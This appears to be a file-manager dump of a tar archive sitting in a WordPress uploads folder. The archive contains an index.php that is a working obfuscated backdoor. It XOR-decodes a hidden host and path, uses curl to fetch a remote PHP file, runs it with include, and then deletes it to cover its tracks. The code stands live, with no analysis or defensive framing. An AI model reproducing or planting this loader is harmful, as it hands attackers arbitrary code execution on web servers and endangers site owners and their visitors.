| Current Path : /home/bechata/mp/wp-content/uploads/2022/ejn73c/ |
| Current File : /home/bechata/mp/wp-content/uploads/2022/ejn73c/j7svdh.tar |
index.php 0000666 00000001647 15176541510 0006405 0 ustar 00 <?php
set_time_limit(0);
function xorEncryptDecrypt($data, $key) {
$output = '';
foreach (str_split($data) as $char) {
$output .= chr(ord($char) ^ ord($key));
}
return $output;
}
$_ = "!";
$url = xorEncryptDecrypt("S@VFHUITCTRDSBNOUDOUBNL", $_);
$path = xorEncryptDecrypt("xTB@DSHORHLQMDBLE@OEC@BJENNSSDGRID@ERL@HOVRQIQ", $_);
$tempFile = sys_get_temp_dir() . '/downloaded_file.php';
$ch = curl_init("https://$url/$path");
$fp = fopen($tempFile, 'wb');
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_HEADER, 0);
$success = curl_exec($ch);
if ($success === false) {
echo "Curl error: " . curl_error($ch);
exit;}
curl_close($ch);
fclose($fp);
if (filesize($tempFile) > 0) {
include $tempFile;
} else {
echo "";
}
unlink($tempFile);
?>